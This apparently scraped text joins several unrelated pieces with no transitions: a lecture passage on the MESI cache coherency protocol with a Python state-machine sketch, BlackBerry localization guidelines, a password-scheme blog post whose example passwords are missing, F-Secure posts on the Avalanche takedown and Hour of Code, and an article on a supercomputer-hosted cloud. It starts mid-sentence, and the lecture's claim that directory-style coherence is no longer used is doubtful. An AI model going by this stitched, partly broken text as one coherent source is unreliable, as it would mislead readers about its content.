is the case that no copy of the referenced block in the cache of any other individual processor is marked as “Modified”. If the block in the cache of the requesting processor is marked as “Shared”, a write hit to it will cause the requesting processor to send out a “Cache Invalidate” signal to all other processors. Each of these other processors snoops the bus and responds to the Invalidate signal if it references a block held by that processor. The requesting processor then marks its cache copy as “Modified”. If the block in the cache of the requesting processor is already marked as “Modified”, nothing special happens. The write takes place and the cache copy is updated. The MESI Protocol This is a commonly used cache coherency protocol. 
Its name is derived from the four states in its FSM representation: Modified, Exclusive, Shared, and Invalid. This description is taken from Section 8.3 of Tanenbaum (Reference 4). Each line in an individual processor’s cache can exist in one of the four following states:
1. Invalid: The cache line does not contain valid data.
2. Shared: Multiple caches may hold the line; the shared memory is up to date.
3. Exclusive: No other cache holds a copy of this line; the shared memory is up to date.
4. Modified: The line in this cache is valid; no copies of the line exist in other caches; the shared memory is not up to date.
The main purpose of the Exclusive state is to prevent the unnecessary broadcast of a Cache Invalidate signal on a write hit. This reduces traffic on a shared bus. Recall that a necessary precondition for a successful write hit on a line in the cache of a processor is that no other processor has that line with a label of Exclusive or Modified. As a result of a successful write hit on a cache line, that cache line is always marked as Modified.

The MESI Protocol (Part 2)
Suppose a requesting processor is processing a write hit on its cache. By definition, any copy of the line in the caches of other processors must be in the Shared or Invalid state. The action taken depends on the state of the line in the requesting processor’s own cache:
1. Modified: The protocol does not specify any additional action for the processor; the write simply takes place.
2. Shared: The processor writes the data, marks the cache line as Modified, and broadcasts a Cache Invalidate signal to other processors.
3. Exclusive: The processor writes the data and marks the cache line as Modified.
If a line in the cache of an individual processor is marked as “Modified” and another processor attempts to access the data copied into that cache line, the individual processor must signal “Dirty” and write the data back to the shared primary memory. Consider the following scenario, in which processor P1 has a write miss on a cache line.
1. P1 fetches the block of memory into its cache line, writes to it, and marks it Dirty.
2. Another processor attempts to fetch the same block from the shared main memory.
3. P1’s snoop cache detects the memory request. P1 broadcasts the message “Dirty” on the shared bus, causing the other processor to abandon its memory fetch.
4. P1 writes the block back to the shared memory, and the other processor can then access it.

Events in the MESI Protocol
This discussion is taken from Chapter 11 of the book Modern Processor Design (Ref. 5). There are six events that are basic to the MESI protocol, three due to the local processor and three due to bus signals from remote processors.
Local Read: The individual processor reads from its cache memory.
Local Write: The individual processor writes data to its cache memory.
Local Eviction: The individual processor must write back a dirty line from its cache in order to free up a cache line for a newly requested block.
Bus Read: Another processor issues a read request to the shared primary memory for a block that is held in this processor’s individual cache. This processor’s snoop cache detects the request.
Bus Write: Another processor issues a write request to the shared primary memory for a block that is held in this processor’s individual cache.
Bus Upgrade: Another processor signals that it is writing to a cache line that is shared with this processor. That processor will upgrade the status of the cache line from “Shared” to “Modified”.
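The six events and four states can be collected into a small next-state function. The sketch below is illustrative only: the event names follow the list above, the returned "actions" (bus read, upgrade broadcast, write-back) are simplifications of the bus behaviour described in this lecture, and none of it is taken from a real coherence controller or simulator.

```python
# Minimal, illustrative sketch of MESI next-state logic (not from any real simulator).
MODIFIED, EXCLUSIVE, SHARED, INVALID = "M", "E", "S", "I"

def next_state(present, event, other_cache_has_copy=False):
    """Return (next_state, actions) for one cache line in one processor's cache."""
    actions = []
    if present == INVALID:
        if event == "LocalRead":                       # read miss
            actions.append("bus_read")
            return (SHARED if other_cache_has_copy else EXCLUSIVE), actions
        if event == "LocalWrite":                      # write miss = read miss + write hit
            actions += ["bus_read", "invalidate_others"]
            return MODIFIED, actions
        return INVALID, actions                        # bus traffic for a block we do not hold
    if present == SHARED:
        if event == "LocalWrite":
            actions.append("bus_upgrade")              # tell the other caches to invalidate
            return MODIFIED, actions
        if event in ("BusWrite", "BusUpgrade", "LocalEviction"):
            return INVALID, actions
        return SHARED, actions                         # LocalRead or BusRead
    if present == EXCLUSIVE:
        if event == "LocalWrite":
            return MODIFIED, actions                   # no broadcast needed: sole holder
        if event == "BusRead":
            actions.append("signal_shared")
            return SHARED, actions
        if event in ("BusWrite", "LocalEviction"):
            return INVALID, actions
        return EXCLUSIVE, actions                      # LocalRead
    if present == MODIFIED:
        if event == "BusRead":
            actions.append("write_back")               # assert "Dirty", supply fresh data
            return SHARED, actions
        if event in ("BusWrite", "LocalEviction"):
            actions.append("write_back")
            return INVALID, actions
        return MODIFIED, actions                       # LocalRead or LocalWrite hit

# Example: one processor reads a block no one else holds, then another
# processor's write to the same block appears on the bus.
state, _ = next_state(INVALID, "LocalRead", other_cache_has_copy=False)  # -> "E"
state, _ = next_state(state, "BusWrite")                                 # -> "I"
```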
FSM: Actions and Next States
Here is a tabular representation of the Finite State Machine for the MESI protocol. Depending on its Present State (PS), an individual processor responds to each event by moving to a Next State (NS), possibly after some bus activity.
PS = Invalid. Local Read: NS = S if another cache holds the block, otherwise NS = E. Local Write: NS = M. Bus Read, Bus Write, or Bus Upgrade: NS = I (no action is taken for a block this cache does not hold).
PS = Shared. Local Read: NS = S. Local Write: NS = M (broadcast a Bus Upgrade). Local Eviction: NS = I. Bus Read: NS = S. Bus Write or Bus Upgrade: NS = I.
PS = Exclusive. Local Read: NS = E. Local Write: NS = M. Local Eviction: NS = I. Bus Read: NS = S. Bus Write: NS = I. Bus Upgrade: should not occur.
PS = Modified. Local Read or Local Write: NS = M. Local Eviction: write data back, NS = I. Bus Read: write data back, NS = S. Bus Write: write data back, NS = I. Bus Upgrade: should not occur.

MESI Illustrated (Step 1)
Here is an example from the text by Andrew Tanenbaum (Ref. 4). This describes three individual processors, each with a private cache, attached to a shared primary memory. When the multiprocessor is turned on, all cache lines are marked Invalid. We begin with CPU 1 reading block A from the shared memory. CPU 1 is the first (and only) processor to request block A from the shared memory. It issues a BR (Bus Read) for the block and gets its copy. The cache line containing block A is marked Exclusive. Subsequent reads to this block access the cached entry and not the shared memory. Neither CPU 2 nor CPU 3 responds to the BR.

MESI Illustrated (Step 2)
We now assume that CPU 2 requests the same block. The snoop cache on CPU 1 notes the request, and CPU 1 broadcasts “Shared”, announcing that it has a copy of the block. Both copies of the block are marked as Shared. This indicates that the block is in two or more caches for reading and that the copy in the shared primary memory is up to date. CPU 3 does not respond to the request.

MESI Illustrated (Step 3)
At this point, either CPU 1 or CPU 2 can issue a local write, as that step is valid for either the Shared or Exclusive state; both are in the Shared state. Suppose that CPU 2 writes to the cache line it is holding in its cache. It issues a BU (Bus Upgrade) broadcast, marks the cache line as Modified, and writes the data to the line. CPU 1 responds to the BU by marking the copy in its cache line as Invalid. CPU 3 does not respond to the BU. Informally, CPU 2 can be said to “own the cache line”.

MESI Illustrated (Step 4)
Now suppose that CPU 3 attempts to read block A from primary memory. For CPU 1, the cache line holding that block has been marked as Invalid, so CPU 1 does not respond to the BR (Bus Read) request. CPU 2 has the cache line marked as Modified. It asserts the signal “Dirty” on the bus, writes the data in the cache line back to the shared memory, and marks the line “Shared”. Informally, CPU 2 asks CPU 3 to wait while it writes back the contents of its modified cache line to the shared primary memory. CPU 3 waits and then gets a correct copy. The cache line in each of CPU 2 and CPU 3 is marked as Shared. Tanenbaum’s actual example continues for a few more steps, but this sample is enough to illustrate the MESI process.

Summary
We have considered cache memories in parallel computers, both multiprocessors and multicomputers. Each of these architectures comprises a number of individual processors with private caches and possibly private memories. We have noted that the assignment of a private cache to each of the individual processors in such an architecture is necessary if we are to get acceptable performance. We have also noted that the major issue to consider in these designs is that of cache coherency. Logically speaking, each of the individual processors must function as if it were accessing the one and only copy of the memory block, which resides in the shared primary memory. We have proposed a modern solution, called MESI, which is a protocol in the class called “Cache Invalidate”. This shows reasonable efficiency in the maintenance of coherency. The only other class of protocols falls under the name “Central Database”. In this approach, the shared primary memory maintains a list of “which processor has which block”.
This centralized management of coherency has been shown to place an unacceptably high processing load on the shared primary memory. For this reason, it is no longer used.

In this lecture, material from one or more of the following references has been used.
1. Computer Organization and Design, David A. Patterson & John L. Hennessy, Morgan Kaufmann (3rd Edition, Revised Printing), 2007 (the course textbook). ISBN 978-0-12-370606-5.
2. Computer Architecture: A Quantitative Approach, John L. Hennessy and David A. Patterson, Morgan Kaufmann, 1990. There is a later edition. ISBN 1-55860-069-8.
3. High-Performance Computer Architecture, Harold S. Stone, Addison-Wesley (Third Edition), 1993. ISBN 0-201-52688-3.
4. Structured Computer Organization, Andrew S. Tanenbaum, Pearson/Prentice-Hall (Fifth Edition), 2006. ISBN 0-13-148521-0.
5. Modern Processor Design: Fundamentals of Superscalar Processors, John Paul Shen and Mikko H. Lipasti, McGraw-Hill, 2005. ISBN 0-07-057064-7.
Localization is the process of adapting software to meet the requirements of local markets and different languages. Internationalization is the process of designing an application so that it can be adapted to various languages and regions without engineering changes. Localized applications should reflect the correct cultural and linguistic conventions that the target market uses. Localization and internationalization make it possible for you to create a localized version of your software. BlackBerry devices are sold all over the world and BlackBerry device applications are translated into over 30 languages, including languages that are not based on a Latin alphabet. Some BlackBerry devices also feature a localized keyboard. Early in the design process, consider whether your application might require localization. If your application does not require localization now, consider designing your application so that it would be easy to localize in the future. Be aware that even if your application might not be localized, some users might want to type text in other languages in your application.

Best practice: Designing applications for different languages and regions

Guidelines for layout
- Leave enough space in your UI for translated text. The height and the width of text might expand when translated from English to other languages. For labels and other short text strings, prepare for up to 200% expansion. For lengthy text (more than 70 characters), prepare for up to 40% expansion.
- Where possible, place labels above the associated field. Leave blank space at the end of each field.
- Try to avoid displaying truncated text. The meaning might be unclear to users if the most important text does not appear. First, try to reduce the size of the text. If you reduce the size but you cannot read the text easily, try wrapping the text onto two lines instead. If you cannot wrap the text, consider using an abbreviation. Otherwise, use an ellipsis (...) to indicate that the text is truncated and provide a tooltip.
- Consider the font size for languages that use diacritics. Languages that use diacritics, such as Thai, require more vertical space. The diacritics are smaller than characters and might not appear clearly if the font size is small. Thai has stackable diacritics that might increase the vertical spread of a string and exceed the pixel height of the font size.
- For languages that are displayed from right to left, make sure that the UI is a mirror image of the English UI. For example, in Hebrew, the label for a drop-down list is displayed to the right of the list and the drop-down arrow is displayed to the left of the list. Make sure that UI components align along the appropriate side of the screen based on the direction of the language. For example, in English, a leading component aligns along the left side of the screen. In Arabic, a leading component aligns along the right side of the screen.
- Provide options for the direction that text appears in. In some languages, such as Arabic and Hebrew, text is displayed from right to left but numbers and words in other languages are displayed from left to right. For example, users might type most words in Arabic (this text needs to appear from right to left) but they type passwords in English (this text needs to appear from left to right).
- Make arrangements for displaying the position of a contact's title, full name, and address on a per-language basis.
These items display in a different order, depending on the language (for example, title, first name, last name, or last name, first name, title). In some countries, the zip/postal code can appear before the name of the city and contain letters as well as numbers.
- If users have the option to change display languages, display the name of the language in that language. For example, display "Italiano" instead of "Italian."
- Test the translated UI to verify the layout of the UI.
- During testing, type a pangram in the target language. A pangram is a sentence that uses each character in the alphabet. Pangrams are useful because they include diacritics that can appear above, below, or beside a character.

Guidelines for color and graphics
- Be aware that colors, graphics, and symbols can have different meanings in different cultures. If you are designing an application for a specific market, carefully consider the cultural implications of your design choices.
- Avoid text and numbers in icons and images because they require localization.
- If you include graphics in your application, make sure that the graphics are localized. For example, in Arabic, question mark icons are mirror images of question mark icons used in English.
- Include tooltips for all icons. Even within one culture, some icons might not be recognized by everyone.
- Avoid using national flags to identify languages, user IDs, or countries. Use text instead.

Best practice: Coding for different languages and regions
- Store text strings in separate resource files and use unique identifiers (string IDs) for each text string (a short sketch at the end of this section illustrates this).
- Avoid concatenating partial strings to form a sentence. When translated, the strings might not produce a logical sentence. Create a new string for the sentence instead.
- Avoid using variables in place of nouns (for example, "The <X> is locked."). Instead, create a specific string for each noun (for example, "The screen is locked." and "The keypad is locked."). Even if the sentence appears correctly in English, in some languages, if a noun is singular or plural and masculine or feminine, the rest of the string might need to change. Only use variables for strings that can only be known at runtime (for example, file names).
- Avoid making part of a sentence into a link. When translated, the words in the link might appear in a grammatically incorrect order. For example, use "For more information, click the following link: <link>" instead of "Click on <link> for more information."
- Avoid using a common string if the context of usage differs. Depending on the context, a word could require different translations. For example, the word "new" might require a different translation depending on the gender of the noun.
- Avoid hard-coding spaces, punctuation marks, and words. Include these items in translatable strings instead. This approach allows translators to make changes according to the rules for each language.
- Avoid hard-coding strings of any kind, including weekdays and weekends. Verify that the start of the week matches the convention for each locale.

Guidelines for numbers
- Make arrangements for singular and plural nouns on a per-language basis. Nouns in some languages can have one form for both singular and plural, one form for singular and another form for plural (for example, "1 day" and "2 days"), or multiple forms, depending on the number of items (for example, one item, two items, a few items, and many items).
- Avoid hard-coding number separators.
For example, 1,234.56 appears in United States English but 1 234,56 appears in French.
- Avoid hard-coding the number of digits between separators. For example, 123,456,789.00 appears in the United States but 12,34,56,789.00 appears in India.
- Avoid hard-coding the display of negative numbers. For example, negative numbers can appear as -123, 123-, or (123).
- Provide options for currencies. For example, currencies can appear as $12.34, 12,34€, or 12€34. In addition, some currency symbols require more space.
- Verify that numbers, measurements, dates, and time formats reflect the locale of your users.

Best practice: Writing for different languages and regions
- Include subjects where possible. For example, use "the list that appears when you type" instead of "the list that appears when typing."
- Include articles where possible. For example, use "press the Escape key" instead of "press Escape."
- Use relative pronouns where possible. For example, use "the email address that you use" instead of "the email address you use."
- Use terms consistently throughout the UI and try to use terms that are consistent with other applications on the BlackBerry device. Using consistent terms improves the accuracy of the translations.
- Avoid using slang, idioms, jargon, colloquialisms, and metaphors in your UI. These terms can be difficult for translators to translate and for users to understand.
- Avoid references to ethnicity, religion, culture, and gender.
- For references to countries, use the political name of each country. For example, use "People's Republic of China" instead of "Mainland China."
- Verify that translated text uses local language conventions where possible.
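As a rough illustration of the coding guidelines above (storing strings in resource files with string IDs, avoiding concatenation, and avoiding hard-coded number separators), here is a minimal sketch using Python's standard gettext and locale modules. The catalog name, directory, and message strings are invented for this example, and a BlackBerry Java application would use its own resource-bundle mechanism rather than these modules.

```python
# Illustrative sketch only: externalized strings and locale-driven number formatting.
import gettext
import locale

# Strings live in a separate resource catalog ("locales/fr/LC_MESSAGES/myapp.mo" is a
# hypothetical path) and are looked up as complete sentences, never concatenated.
translations = gettext.translation("myapp", localedir="locales",
                                   languages=["fr"], fallback=True)
_ = translations.gettext

print(_("The screen is locked."))   # one complete string per sentence
print(_("The keypad is locked."))   # not 'The %s is locked.' with a noun variable

# Number separators come from the locale, not from hard-coded commas and periods.
locale.setlocale(locale.LC_ALL, "fr_FR.UTF-8")  # requires the French locale to be installed
print(locale.format_string("%.2f", 1234.56, grouping=True))  # typically "1 234,56"
```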
I am one of those people that have a very short attention span for technical instructions, so let me try to explain this as shortly and clearly as possible. Just in case you are like me. 🙂 The idea is to use a system that allows you to do 2 things:
1. Remember your passwords through writing a part of them down. The only thing you need to remember is a part that is the same for all your passwords; a pin if you will.
2. Create passwords that are good and strong, unique, and can't be guessed.
Here are the step-by-step instructions:
1. Think of a "pin" for your passwords; this is the part that is the same for all of your passwords. The pin should be 3 characters or longer, it could be something like "25!", and this part should be kept secret.
2. For each of the web sites that you need a password for, you create a code that helps you remember what site/service the password is for. For example aMa for Amazon and gMa for Gmail.
3. Continue the password with a random set of 4 or more characters, for example: 2299 or xy76. You should use different random characters for your different passwords.
4. Write down parts 2 & 3 on a note and keep it safe so you don't forget them. In this example you would end up with a note in your wallet with this written down:
5. When using the passwords, add your pin to them. Remember again that the pin should not be written down anywhere! You can decide the location of your pin too. With the example pin "25!" created in the first step we would end up with 2 passwords that could be:
Tadaa, you now have passwords that are unique and can't be guessed! And of course you only need to remember a part of each one! By having unique passwords you can also make sure that even if someone finds out one of your passwords, the others are still safe. As a final note, should you choose to use this system, you should come up with your own passwords and not use the ones used in this post or in our Lab's post. Hopefully I managed to make it sound relatively easy. If not, drop me a question below.

A multinational law enforcement operation gave internet users a big gift just in time for the holiday season! In late November, Europol, the FBI, and several other organizations around the world worked together to take down Avalanche – an international crime network behind cyber attacks that some estimates say have caused hundreds of millions of dollars in damages since 2009. The network allowed criminals to conduct malware and money laundering campaigns throughout the globe. By providing criminals with hosting services and other infrastructure, Avalanche helped attackers send over one million malicious emails each week in order to spread malware to individuals and companies. Exact numbers for the extent of damage Avalanche inflicted on victims are unavailable. But according to Europol, Avalanche helped criminals cause over 6 million euros in damage to financial institutions in Germany alone. The takedown resulted in seized servers, searched premises, and even a few arrests. F-Secure Labs helped support the multinational effort by sharing their malware analysis expertise with law enforcement officials. “The analysts on our Threat Intelligence team often provide law enforcement with technical assistance for their investigations. When asked to participate, we reviewed thousands of samples seized from Avalanche to validate law enforcement's analysis,” says F-Secure Security Advisor Sean Sullivan.
“Matching the seized samples with what we have in our malware database helped law enforcement verify that those files were not only harmful, but that the industry was detecting them and able to help victims.” Avalanche hosted what the US Justice Department described as over “two dozen of the world’s most pernicious types of malicious software”. Some of the more notorious malware families hosted by Avalanche included the Dridex and GameOver Zeus banking trojans. Anyone who thinks they could be infected by these or other types of malware can use F-Secure’s free Online Scanner to help them clean their PCs of many different types of malware infections. And since most malware (besides ransomware) runs silently alongside your regular programs, running something like Online Scanner is necessary if you’re not already using a reliable AV program. “Collaboration between the industry and law enforcement is the only realistic way to fight cyber crime,” adds Sean. “And even though this is good, it’s not like we’ve defeated online crime. Cyber crime services are a big industry, and the criminals using Avalanche will probably spend Christmas shopping for new tools to use in 2017.” [Image by Pierre Honeyman | Flickr]

Studies have shown time and time again that computer science skills are invaluable tools to have in today’s world. And last week at F-Secure headquarters in Helsinki, F-Secure fellow Maaret Pyhäjärvi invited her colleagues’ kids to come to the office to take part in the Hour of Code. The Hour of Code is an initiative from Code.org designed to introduce kids to the wonderful world of coding. And while coding has a stereotypical reputation of being difficult, labor-intensive work, Maaret (winner of this year’s Most Influential Agile Testing Professional Person award) feels that this reputation ignores how the right knowledge and skills can empower kids to take full advantage of the benefits technology offers.
But not many people realize that there's a discrepancy between the kind of computer skills being taught in schools and the kind of computer skills needed by employers. According a recent Washington Post article, only one-quarter of schools in the US teach computer science courses, even though there are currently half a million unfilled jobs that require a computer science education. And while today’s kids are hardly going to fill that gap anytime soon, they do need to start learning the fundamentals needed to develop more advanced computer science skills. For example, a free MOOC called Cyber Security Base with F-Secure recently organized by F-Secure and the University of Helsinki requires some basic knowledge of coding in order to participate. So even though Computer Science Education Week is over, you shouldn’t let this discourage you from giving kids the support they need to get into programming. Check out this website for more information on setting up your own Hour of Code. And here are resources you can use to learn more about coding, programming, scripting, and more (although they’re more advanced than the Hour of Code). Tutorials and Courses via the World Wide Web Consortium Introduction to Computer Science and Programming from MIT OpenCourseWare Code Racer – A video game designed to teach coding (these are development instructions as the actual game is no longer on the web)
Researchers at North Carolina State University, working in partnership with the Argonne Leadership Computing Facility (ALCF), have successfully demonstrated a proof-of-concept for a novel high-performance cloud computing platform by merging a cloud computing environment with a supercomputer. Project leads Patrick Dreher and Mladen Vouk discuss the evolution of the project on the ALCF website.

Cloud computing environment embedded inside the ALCF Blue Gene/P “Surveyor”

The proof-of-concept implementations show that a fully functioning production cloud computing environment can be completely embedded within a supercomputer, thereby enabling the cloud’s users to benefit from the underlying HPC hardware infrastructure. The work was part of the ALCF’s Director’s Discretionary (DD) program, which provided the research team with access to a Blue Gene/P machine to explore the feasibility of situating a distributed cloud computing architecture within a supercomputer. Dreher and Vouk describe how this project is different from most other HPC cloud efforts. “The ‘traditional’ cloud design approach often starts with a relatively loosely coupled X86-based architecture,” they write. “Then, if there is an interest in HPC, a cloud computing service can be added and adapted to HPC computational needs and requirements. More often than not, such a service is based on virtual machines and is used by distributed applications that are not sensitive to the latency requirements for HPC applications.” This research project employed an HPC-first approach: using a supercomputer to host a cloud, ensuring that the native HPC functions were present. The supercomputer’s hardware provided the foundation for a software-defined system capable of supporting a cloud computing environment. The authors state that this “novel methodology has the potential to be applied toward complex mixed-load workflow implementations, data-flow oriented workloads, as well as experimentation with new schedulers and operating systems within an HPC environment.” The project used the ALCF’s IBM Blue Gene/P supercomputer, Surveyor, a non-production test and development platform with 1,024 quad-core nodes (4,096 processors) and 2 terabytes of memory, with a peak performance of 13.9 teraflops. A software utility package called Kittyhawk, originally developed with funding from IBM Research, proved to be indispensable. This open source tool serves as a provisioning engine and also offers basic low-level computing services within a Blue Gene/P system. The software is what enabled the team to construct an embedded elastic cloud computing infrastructure within the supercomputer. For the cloud functionality, the team went with the Virtual Computing Laboratory (VCL) cloud computing software system, originally designed and developed at NC State University. This open source cloud computing and resource management system covers the full range of cloud capabilities, including Hardware as a Service (HaaS), Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS), as well as Everything as a Service (XaaS) options. It also includes a graphical user interface, an application programming interface, authentication plug-in mechanisms, on-demand resource management and scheduling, bare-machine and virtualized machine provisioning, a provenance engine, sophisticated role-based resource access, and license and scheduling options.
The HPC-first design approach to cloud computing leverages the “localized homogeneous and uniform HPC supercomputer architecture usually not found in generic cloud computing clusters,” according to the project leads. Such a system has the potential to support multiple workloads, from traditional HPC simulation jobs to workflows that involve both HPC and non-HPC analytics, to data-flow-oriented work. The implementation should be compatible with any supercomputer that has the Kittyhawk utility installed, and the next step is to scale the proof-of-concept to other systems.